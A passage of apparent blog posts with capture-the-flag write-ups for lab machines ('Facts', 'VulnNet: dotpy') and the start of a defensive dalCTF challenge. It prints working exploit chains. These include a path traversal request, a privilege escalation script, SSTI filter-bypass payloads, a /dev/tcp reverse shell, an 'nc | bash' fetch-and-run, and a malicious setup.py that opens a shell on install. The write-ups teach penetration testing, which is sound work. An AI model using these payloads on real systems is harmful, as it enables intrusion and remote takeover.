nginx on port 80.</p> <h3> /etc/hosts </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s2">"&lt;MACHINE-IP&gt; facts.htb"</span> <span class="o">&gt;&gt;</span> /etc/hosts </code></pre> </div> <h3> Web Enumeration </h3> <p>Visiting port 80 presents a Camaleon CMS trivia site. The <code>/admin</code> path redirects to <code>/admin/login</code>, which has self-registration enabled.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>feroxbuster <span class="nt">-u</span> http://facts.htb/ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">-d</span> 3 <span class="nt">-C</span> 403,404 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">302 http://facts.htb/admin =&gt;</span><span class="w"> </span>http://facts.htb/admin/login <span class="go">200 http://facts.htb/ajax </span></code></pre> </div> <p>Navigating to <code>/admin/login</code> and clicking <strong>"Create an account"</strong> creates a working low-privilege CMS account. After logging in, the footer reveals <strong>Camaleon CMS Version 2.9.0</strong>.</p> <h2> Initial Access — LFI via CVE-2024-46987 </h2> <p>Camaleon CMS &lt; 2.9.1 is vulnerable to a path traversal in the <code>download_private_file</code> media endpoint. Any authenticated user, regardless of role, can read arbitrary files from the server filesystem.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">GET http://facts.htb/admin/media/download_private_file?file=../../../etc/passwd </span></code></pre> </div> <p>This returns the contents of <code>/etc/passwd</code>, confirming arbitrary file read. Relevant system users:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root:x:0:0:root:/root:/bin/bash trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash william:x:1001:1001::/home/william:/bin/bash </code></pre> </div> <h2> Foothold — CMS Admin via CVE-2025-2304 (Mass Assignment) </h2> <p>Camaleon CMS &lt; 2.9.1 is also vulnerable to mass assignment in the <code>updated_ajax</code> password-change endpoint. The controller uses Rails' dangerous <code>permit!</code> method which allows all parameters through without any filtering — including <code>role</code>.</p> <p>Injecting <code>password[role]=admin</code> into the password change POST request escalates a low-privilege account to full CMS admin.</p> <p><strong>Exploit script (<code>exploit.py</code>):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">update_data</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">_method</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">patch</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">authenticity_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">auth_token</span><span class="p">,</span> <span class="sh">"</span><span class="s">password[password]</span><span class="sh">"</span><span class="p">:</span> <span class="n">password</span><span class="p">,</span> <span class="sh">"</span><span class="s">password[password_confirmation]</span><span class="sh">"</span><span class="p">:</span> <span class="n">password</span><span class="p">,</span> <span class="sh">"</span><span class="s">password[role]</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="p">}</span> <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">submit_url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">update_data</span><span class="p">)</span> </code></pre> </div> <p>Running the exploit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 exploit.py <span class="nt">-t</span> http://facts.htb <span class="nt">-u</span> <span class="nb">test</span> <span class="nt">-p</span> <span class="nb">test</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[+] Login successful [+] Got profile page [i] Version 2.9.0 — appears vulnerable (&lt; 2.9.1) [+] Got CSRF token: E9u8O-QxqReFdXp6FbaD... [*] Sending privilege escalation request to http://facts.htb/admin/users/5/updated_ajax ... [+] Done! Role should now be 'admin' — try refreshing your session. </span></code></pre> </div> <p>After refreshing the session, the full admin navigation is available including Settings, Users, Plugins, and Appearance.</p> <h2> AWS S3 Credential Leak </h2> <p>Navigating to <strong>Settings → General Site → Filesystem Settings</strong> exposes AWS S3 credentials stored in plaintext in the CMS configuration:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight properties"><code><span class="err">AWS</span> <span class="err">Access</span> <span class="err">Key</span> <span class="py">ID</span><span class="p">:</span> <span class="s">AKIA604F64A80C48D2DF</span> <span class="err">AWS</span> <span class="err">Secret</span> <span class="err">Access</span> <span class="py">Key</span><span class="p">:</span> <span class="s">/Vb8uEE1VHYg7rcu84gpSnmF9Tb8XoIT020xkWDo</span> <span class="err">Bucket</span> <span class="py">Name</span><span class="p">:</span> <span class="s">randomfacts</span> <span class="py">Region</span><span class="p">:</span> <span class="s">us-east-1</span> <span class="py">Endpoint</span><span class="p">:</span> <span class="s">http://localhost:54321</span> </code></pre> </div> <p>The endpoint points to a LocalStack instance running locally on the target. Since port 54321 is bound to localhost on the box, it is accessed via <code>facts.htb:54321</code> after adding the host entry. Configuring the AWS CLI with the leaked credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws configure <span class="c"># AWS Access Key ID: AKIA604F64A80C48D2DF</span> <span class="c"># AWS Secret Access Key: /Vb8uEE1VHYg7rcu84gpSnmF9Tb8XoIT020xkWDo</span> <span class="c"># Default region name: us-east-1</span> <span class="c"># Default output format: json</span> </code></pre> </div> <p>Listing all buckets:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws <span class="nt">--endpoint-url</span> http://facts.htb:54321 s3 <span class="nb">ls</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>2025-09-11 internal 2025-09-11 randomfacts </code></pre> </div> <p>A non-public <code>internal</code> bucket exists alongside the expected <code>randomfacts</code> bucket. Listing it recursively:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws <span class="nt">--endpoint-url</span> http://facts.htb:54321 s3 <span class="nb">ls </span>s3://internal <span class="nt">--recursive</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>2026-06-10 .ssh/authorized_keys 2026-06-10 .ssh/id_ed25519 </code></pre> </div> <p>An SSH private key is present. Downloading it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws <span class="nt">--endpoint-url</span> http://facts.htb:54321 s3 <span class="nb">cp </span>s3://internal/.ssh/id_ed25519 <span class="nb">.</span> <span class="nb">chmod </span>600 id_ed25519 </code></pre> </div> <h2> SSH — Cracking the Key Passphrase </h2> <p>Attempting to use the key immediately prompts for a passphrase, confirming it is encrypted:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh-keygen <span class="nt">-y</span> <span class="nt">-f</span> id_ed25519 <span class="c"># Enter passphrase for "id_ed25519":</span> </code></pre> </div> <p>Converting to john format and cracking against rockyou:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh2john id_ed25519 <span class="o">&gt;</span> hash.john john hash.john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>dragonballz (id_ed25519) 1g 0:00:02:42 DONE </code></pre> </div> <p>Passphrase cracked: <strong>dragonballz</strong></p> <p>Connecting as <code>trivia</code> (identified earlier via the LFI on <code>/etc/passwd</code>):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh <span class="nt">-i</span> id_ed25519 trivia@&lt;MACHINE-IP&gt; <span class="c"># Enter passphrase for key 'id_ed25519': dragonballz</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">trivia@facts:~$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1000(trivia) gid=1000(trivia) groups=1000(trivia) </span></code></pre> </div> <h2> User Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>trivia@facts:~<span class="nv">$ </span><span class="nb">cat</span> /home/william/user.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTB{REDACTED} </code></pre> </div> <h2> Privilege Escalation to Root — Facter Custom Module </h2> <p>Checking sudo permissions for the current user:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>User trivia may run the following commands on facts: (ALL) NOPASSWD: /usr/bin/facter </code></pre> </div> <p><code>facter</code> is a Puppet system facts tool that supports loading custom Ruby fact modules via the <code>--custom-dir</code> flag. Running it under sudo with a controlled directory allows arbitrary Ruby execution as root.</p> <p>Creating a malicious fact module that sets the SUID bit on <code>/usr/bin/bash</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'Facter.add("evil") {setcode { `chmod +s /usr/bin/bash` } }'</span> <span class="o">&gt;</span> evil.rb </code></pre> </div> <p>Running facter with the custom module:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> /usr/bin/facter <span class="nt">--custom-dir</span> ~ evil </code></pre> </div> <p>Verifying the SUID bit was set:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">ls</span> <span class="nt">-la</span> /usr/bin/bash <span class="c"># -rwsr-sr-x 1 root root ... /usr/bin/bash</span> </code></pre> </div> <p>Spawning a root shell with bash's <code>-p</code> flag (preserve effective UID):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bash <span class="nt">-p</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">bash-5.2#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span></code></pre> </div> <h2> Root Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bash-5.2# <span class="nb">cat</span> /root/root.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTB{REDACTED} </code></pre> </div> <h2> Credentials Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>User</th> <th>Credential</th> <th>Source</th> </tr> </thead> <tbody> <tr> <td>trivia (CMS)</td> <td>test / test</td> <td>Self-registration</td> </tr> <tr> <td>trivia (SSH)</td> <td>id_ed25519 / dragonballz</td> <td>Internal S3 bucket + john</td> </tr> <tr> <td>root</td> <td>—</td> <td>facter sudo SUID trick</td> </tr> </tbody> </table></div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>CVE-2024-46987 — Camaleon CMS path traversal in <code>download_private_file</code> </td> <td>Arbitrary file read as web user</td> </tr> <tr> <td>2</td> <td>CVE-2025-2304 — Camaleon CMS mass assignment via <code>permit!</code> in <code>updated_ajax</code> </td> <td>Role escalation to CMS admin</td> </tr> <tr> <td>3</td> <td>AWS S3 credentials exposed in CMS filesystem settings</td> <td>Access to internal LocalStack bucket</td> </tr> <tr> <td>4</td> <td>SSH private key stored in internal S3 bucket with weak passphrase</td> <td>Shell as <code>trivia</code> </td> </tr> <tr> <td>5</td> <td> <code>sudo /usr/bin/facter --custom-dir</code> (NOPASSWD) with controllable Ruby</td> <td>Root via SUID bash</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Self-Registration → Low-Privilege CMS Account → CVE-2024-46987 LFI → /etc/passwd (user enumeration) → CVE-2025-2304 Mass Assignment → CMS Admin Role → Settings Panel → AWS S3 Credentials (plaintext) → LocalStack S3 → internal bucket → id_ed25519 → john + rockyou → passphrase: dragonballz → SSH as trivia → sudo facter --custom-dir (NOPASSWD) → Custom Ruby Fact → chmod +s /usr/bin/bash → bash -p → root </code></pre> </div> hackthebox linux infosec cybersecurity TryHackMe - VulnNet: dotpy Writeup Yogeshwar Peela Wed, 10 Jun 2026 04:26:24 +0000 https://dev.to/exploitnotes/tryhackme-vulnnet-dotpy-writeup-8nj https://dev.to/exploitnotes/tryhackme-vulnnet-dotpy-writeup-8nj <h2> Machine Information </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Field</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>Platform</td> <td>TryHackMe</td> </tr> <tr> <td>Room</td> <td>VulnNet: dotpy</td> </tr> <tr> <td>Difficulty</td> <td>Medium</td> </tr> <tr> <td>OS</td> <td>Linux</td> </tr> <tr> <td>Web Stack</td> <td>Python / Flask (Werkzeug 1.0.1)</td> </tr> </tbody> </table></div> <h2> Reconnaissance </h2> <h3> Port Scan </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sCV</span> <span class="nt">-A</span> MACHINE-IP <span class="nt">-oA</span> output </code></pre> </div> <p>Only one port open:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">8080/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9) </span></code></pre> </div> <p>The web app redirects to <code>/login</code> and is confirmed to be a Flask application running under Werkzeug.</p> <h3> Directory Enumeration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>dirsearch <span class="nt">-u</span> http://MACHINE-IP:8080/ <span class="nt">-x</span> 403,404 </code></pre> </div> <p>Findings:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Path</th> <th>Status</th> <th>Notes</th> </tr> </thead> <tbody> <tr> <td><code>/login</code></td> <td>200</td> <td>Login form</td> </tr> <tr> <td><code>/register</code></td> <td>200</td> <td>Registration form</td> </tr> <tr> <td><code>/shutdown</code></td> <td>200</td> <td>23 bytes — Werkzeug debug endpoint</td> </tr> </tbody> </table></div> <h2> Initial Access — SSTI to RCE </h2> <h3> Step 1: Register &amp; Login </h3> <p>Registered a test account at <code>/register</code> and authenticated. The post-login dashboard is a Staradmin template with no immediately obvious injection points.</p> <h3> Step 2: SSTI Discovery </h3> <p>Navigating to <code>http://dotpy.thm:8080/env</code> returns a styled 404 page that echoes the URL path back into the body:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>No results for env </code></pre> </div> <p>Injecting <code>{{7*7}}</code> in the path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jinja"><code>http://dotpy.thm:8080/<span class="cp">{{</span><span class="nv">7</span><span class="o">*</span><span class="nv">7</span><span class="cp">}}</span> </code></pre> </div> <p>Returns:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>No results for 49 </code></pre> </div> <p>SSTI confirmed. The source code traceback (visible via Werkzeug debug mode) confirms the path is passed into <code>render_template_string()</code> on TemplateNotFound.</p> <h3> Step 3: Config Dump via <code>{{config}}</code> </h3> <div class="highlight js-code-highlight"> <pre class="highlight jinja"><code>http://dotpy.thm:8080/<span class="cp">{{</span><span class="nv">config</span><span class="cp">}}</span> </code></pre> </div> <p>The 404 body leaks the full Flask config, including:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">'SECRET_KEY':</span><span class="w"> </span><span class="err">'S</span><span class="mi">3</span><span class="err">cr</span><span class="mi">3</span><span class="err">t_K#Key'</span><span class="w"> </span></code></pre> </div> <p>This allows forging session cookies with <code>flask-unsign</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>flask-unsign <span class="nt">--decode</span> <span class="nt">--cookie</span> <span class="s1">'&lt;session_cookie&gt;'</span> flask-unsign <span class="nt">--sign</span> <span class="nt">--cookie</span> <span class="s2">"{'_fresh': True, ...}"</span> <span class="nt">--secret</span> <span class="s1">'S3cr3t_K#Key'</span> </code></pre> </div> <p>Although a forged admin cookie was generated, it yielded no additional access surface — the real prize was RCE.</p> <h3> Step 4: WAF / Filter Bypass </h3> <p>The application blocks certain characters in the URL path:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Blocked</th> <th>Reason</th> </tr> </thead> <tbody> <tr> <td> <code>.</code> (dot)</td> <td>Prevents attribute access</td> </tr> <tr> <td> <code>_</code> (underscore)</td> <td>Prevents dunder access</td> </tr> <tr> <td> <code>[</code> <code>]</code> </td> <td>Prevents subscript access</td> </tr> <tr> <td><code>\</code></td> <td>Converted to <code>/</code> server-side</td> </tr> </tbody> </table></div> <p>The pipe <code>|</code> operator (Jinja2 filter chaining) is <strong>not</strong> blocked.</p> <p>Initial attempt using hex encoding (<code>\x5f</code>) for underscores failed because the server converts backslashes to forward slashes.</p> <p><strong>Working bypass</strong> — using <code>%c</code> format string to synthesize underscores at runtime, combined with <code>attr()</code> for attribute access:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jinja"><code><span class="cp">{{</span><span class="nv">lipsum</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"%25c"</span><span class="o">|</span><span class="nf">format</span><span class="p">(</span><span class="nv">95</span><span class="p">)</span><span class="err">~</span><span class="s2">"%25c"</span><span class="o">|</span><span class="nf">format</span><span class="p">(</span><span class="nv">95</span><span class="p">)</span><span class="err">~</span><span class="s2">"globals"</span><span class="err">~</span><span class="s2">"%25c"</span><span class="o">|</span><span class="nf">format</span><span class="p">(</span><span class="nv">95</span><span class="p">)</span><span class="err">~</span><span class="s2">"%25c"</span><span class="o">|</span><span class="nf">format</span><span class="p">(</span><span class="nv">95</span><span class="p">))</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="err">...</span><span class="p">)(</span><span class="s2">"os"</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"popen"</span><span class="p">)(</span><span class="s2">"id"</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"read"</span><span class="p">)()</span><span class="cp">}}</span> </code></pre> </div> <p>Output: <code>uid=1001(web) gid=1001(web) groups=1001(web)</code> — RCE confirmed as <code>web</code>.</p> <h3> Step 5: Reverse Shell </h3> <p>Since <code>/</code> in commands is blocked, standard reverse shell payloads fail. Two bypasses were chained:</p> <p><strong>Bypass 1 — IP as decimal integer (no dots):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">printf</span> <span class="s1">'%d\n'</span> <span class="si">$(</span><span class="nb">printf</span> <span class="s1">'0x%02x%02x%02x%02x\n'</span> 192 168 236 96<span class="si">)</span> <span class="c"># Result: YOUR-IP-DECIMAL</span> </code></pre> </div> <p><strong>Bypass 2 — Pipe netcat output directly to bash (no file write, no slashes in path):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc YOUR-IP-DECIMAL 8001 | bash </code></pre> </div> <p><strong>Attack setup:</strong></p> <p>Terminal 1 (serve shell payload):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 8001 &lt; shell.sh </code></pre> </div> <p><code>shell.sh</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bash <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/YOUR-IP/4444 0&gt;&amp;1 </code></pre> </div> <p>Terminal 2 (catch shell):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4444 </code></pre> </div> <p><strong>Final SSTI payload delivered via URL:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jinja"><code><span class="cp">{{</span><span class="p">(</span><span class="nv">lipsum</span><span class="p">,)</span><span class="o">|</span><span class="nf">map</span><span class="p">(</span><span class="o">**</span><span class="err">{</span><span class="s2">"at"</span><span class="o">+</span><span class="s2">"tribute"</span><span class="err">:</span><span class="p">(</span><span class="s2">"%c%cglobals%c%c"</span><span class="o">|</span><span class="nf">format</span><span class="p">(</span><span class="nv">95</span><span class="p">,</span><span class="nv">95</span><span class="p">,</span><span class="nv">95</span><span class="p">,</span><span class="nv">95</span><span class="p">))</span><span class="err">}</span><span class="p">)</span><span class="o">|</span><span class="nf">list</span><span class="o">|</span><span class="nf">first</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"get"</span><span class="p">)(</span><span class="s2">"os"</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"popen"</span><span class="p">)(</span><span class="s2">"nc YOUR-IP-DECIMAL 8001|bash"</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="s2">"read"</span><span class="p">)()</span><span class="cp">}}</span> </code></pre> </div> <p>Shell received as <code>web</code>.</p> <h2> Privilege Escalation </h2> <h3> web → system-adm (Malicious pip3 Package) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> <span class="c"># (system-adm) NOPASSWD: /usr/bin/pip3 install *</span> </code></pre> </div> <p><code>web</code> can run <code>pip3 install</code> as <code>system-adm</code> without a password.</p> <p>Created a malicious Python package in <code>/tmp/evil/</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># setup.py </span><span class="kn">import</span> <span class="n">socket</span><span class="p">,</span><span class="n">subprocess</span><span class="p">,</span><span class="n">os</span> <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="nf">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="nf">connect</span><span class="p">((</span><span class="sh">"</span><span class="s">YOUR-IP</span><span class="sh">"</span><span class="p">,</span><span class="mi">4443</span><span class="p">))</span> <span class="n">os</span><span class="p">.</span><span class="nf">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="nf">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">);</span> <span class="n">os</span><span class="p">.</span><span class="nf">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="nf">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">);</span> <span class="n">os</span><span class="p">.</span><span class="nf">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="nf">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span> <span class="kn">import</span> <span class="n">pty</span><span class="p">;</span> <span class="n">pty</span><span class="p">.</span><span class="nf">spawn</span><span class="p">(</span><span class="sh">"</span><span class="s">sh</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>Started a listener then triggered the install:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-u</span> system-adm /usr/bin/pip3 <span class="nb">install</span> <span class="nb">.</span> </code></pre> </div> <p>Shell received as <code>system-adm</code>. User flag retrieved:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>THM{REDACTED} </code></pre> </div> <h3> system-adm → root (PYTHONPATH Hijack) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> <span class="c"># (ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py</span> </code></pre> </div> <p><code>system-adm</code> can run <code>backup.py</code> as any user with <code>SETENV</code> — meaning environment variables like <code>PYTHONPATH</code> can be set.</p> <p>Inspecting <code>/opt/backup.py</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">datetime</span> <span class="kn">import</span> <span class="n">datetime</span> <span class="kn">from</span> <span class="n">pathlib</span> <span class="kn">import</span> <span class="n">Path</span> <span class="kn">import</span> <span class="n">zipfile</span> <span class="c1"># &lt;-- imported module </span></code></pre> </div> <p>The script imports the standard library module <code>zipfile</code>. By placing a malicious <code>zipfile.py</code> in <code>/home/system-adm</code> and prepending that directory to <code>PYTHONPATH</code>, Python will load the malicious module instead:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> <span class="o">&gt;</span> /home/system-adm/zipfile.py <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">' import os os.system("/bin/bash") </span><span class="no">EOF </span></code></pre> </div> <p>Triggered with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span><span class="nv">PYTHONPATH</span><span class="o">=</span>/home/system-adm /usr/bin/python3 /opt/backup.py </code></pre> </div> <p>Spawned a root shell. Root flag retrieved:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>THM{REDACTED} </code></pre> </div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>nmap</td> <td>Port scanning</td> </tr> <tr> <td>dirsearch</td> <td>Directory enumeration</td> </tr> <tr> <td>flask-unsign</td> <td>Flask session cookie decode/forge</td> </tr> <tr> <td>netcat</td> <td>Reverse shell delivery and catching</td> </tr> <tr> <td>PayloadsAllTheThings</td> <td>SSTI Jinja2 bypass reference</td> </tr> </tbody> </table></div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Vulnerability</th> <th>Location</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>Server-Side Template Injection (SSTI)</td> <td>URL path reflected into <code>render_template_string</code> </td> <td>RCE as <code>web</code> </td> </tr> <tr> <td>Flask SECRET_KEY disclosure via SSTI</td> <td> <code>{{config}}</code> payload</td> <td>Session forgery</td> </tr> <tr> <td>Sudo pip3 install abuse</td> <td><code>web → system-adm</code></td> <td>Lateral movement</td> </tr> <tr> <td>PYTHONPATH hijack via <code>zipfile.py</code> </td> <td><code>system-adm → root</code></td> <td>Full privilege escalation</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight markdown"><code>[Recon: nmap + dirsearch] | [Register + Login → Dashboard] | [SSTI Discovery: {{7<span class="err">*</span>7}} → 49 in 404 body] | [{{config}} → SECRET_KEY: S3cr3t_K#Key] | [Character Filter Bypass (. _ [ ])] | [SSTI RCE via lipsum + %c format + attr chaining] | [Reverse Shell → web] | [sudo pip3 install → malicious setup.py → system-adm] | [PYTHONPATH hijack → zipfile.py → root] </code></pre> </div> <h2> Key Takeaways </h2> <ul> <li> <strong>SSTI in Flask's render_template_string is critical</strong> — even indirect injection via a 404 handler is fully exploitable.</li> <li> <strong>Character-based WAFs are bypassable</strong> — Jinja2's <code>|attr()</code>, <code>%c</code> format tricks, and filter chaining can reconstruct blocked characters at template evaluation time.</li> <li> <strong>IP decimal notation</strong> bypasses dot-blocked command environments without needing encoding.</li> <li> <strong><code>SETENV</code> in sudo rules is dangerous</strong> — allowing the invoker to set environment variables like <code>PYTHONPATH</code> effectively grants arbitrary code execution at the target privilege level.</li> <li> <strong>pip3 as sudo is an instant privilege escalation path</strong> — any writable directory can host a malicious <code>setup.py</code>.</li> </ul> tryhackme ctf python jinja Render & Plunder - dalCTF 2026 Yogeshwar Peela Mon, 08 Jun 2026 14:52:32 +0000 https://dev.to/exploitnotes/render-plunder-dalctf-2026-7l2 https://dev.to/exploitnotes/render-plunder-dalctf-2026-7l2 <p><strong>Challenge:</strong> Render &amp; Plunder<br><br> <strong>Category:</strong> Web Security / Defense </p> <h2> Challenge Description </h2> <blockquote> <p>I wrote a user-profile service with a nice renderer for myself. Surely it's secure, right? Take a look and patch any vulnerabilities while keeping the app fully functional.<br> "You know how to enter. Find the way out."</p> </blockquote> <p>A Python Flask app with login, user profile GET/PUT, and a <code>/render</code> endpoint. We must <strong>defend</strong> it — patch all vulnerabilities without breaking functionality.</p> <h2> Vulnerability Analysis </h2> <p>The original code had <strong>three vulnerabilities</strong>:</p> <h3> 1. Server-Side Template Injection (SSTI) — Critical </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># VULNERABLE </span><span class="n">name</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">User</span><span class="sh">"</span><span class="p">)</span> <span class="n">template_source</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Hello </span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="s">! Here is your report for user </span><span class="si">{</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">?</span><span class="sh">'</span><span class="p">)</span><span class="si">}</span><span class="s">.</span><span class="sh">"</span> <span class="n">result</span> <span class="o">=</span> <span class="nc">Template</span><span class="p">(</span><span class="n">template_source</span><span class="p">).</span><span class="nf">render</span><span class="p">()</span> </code></pre> </div> <p>User-controlled <code>name</code> is interpolated <strong>directly into a Jinja2 template string</strong> before rendering. An attacker can send:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{{ 7*7 }}"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>And get back <code>Hello 49!</code> — confirming code execution. From there, full RCE is trivial:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jinja"><code><span class="cp">{{</span> <span class="nv">self.__init__.__globals__.__builtins__.__import__</span><span class="p">(</span><span class="s1">'os'</span><span class="p">)</span><span class="err">.</span><span class="nv">popen</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span><span class="err">.</span><span class="nv">read</span><span class="p">()</span> <span class="cp">}}</span> 